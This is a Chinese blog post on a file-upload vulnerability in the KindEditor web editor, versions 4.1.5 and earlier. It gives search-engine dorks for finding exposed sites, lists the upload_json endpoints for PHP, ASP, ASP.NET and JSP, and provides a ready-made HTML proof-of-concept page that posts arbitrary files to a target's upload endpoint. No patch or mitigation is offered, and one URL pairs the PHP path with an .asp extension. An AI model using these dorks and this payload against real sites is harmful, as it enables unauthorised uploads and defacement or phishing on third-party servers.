How Hard You Are
How Special You Are

kindeditor<=4.1.5文件上传漏洞

漏洞描述:

漏洞存在于kindeditor编辑器里,你能上传.txt.html文件,支持php/asp/jsp/asp.net

漏洞存在于小于等于kindeditor4.1.5编辑器中,以下代码查看版本信息

allinurl:/kindeditor/kindeditor.js

关键字:

allinurl:/examples/uploadbutton.html

allinurl:/php/upload_json.php / .asp / .jsp

根本脚本语言自定义不同的上传地址,上传之前有必要验证文件upload_json.*的存在

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

POC:

<html><head>

<title>Kindeditor</title>

<script src="https://[Target]/kindeditor/kindeditor-min.js"></script>

<script>

KindEditor.ready(function(K) {

var uploadbutton = K.uploadbutton({

button : K('#uploadButton')[0],

fieldName : 'imgFile',

url : 'http://[Target]/kindeditor/php/upload_json.asp?dir=file',

afterUpload : function(data) {

if (data.error === 0) {

var url = K.formatUrl(data.url, 'absolute');

K('#url').val(url);}

},

});

uploadbutton.fileBox.change(function(e) {

uploadbutton.submit();

});

});

</script></head><body>

<div class="upload">

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

<input type="button" id="uploadButton" value="Upload" />

</div>

</body>

</html>
赞(0) 打赏
未经允许不得转载:哪吒博客 » kindeditor<=4.1.5文件上传漏洞
分享到: 更多 (0)

评论【支持markdown语法】 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

隐藏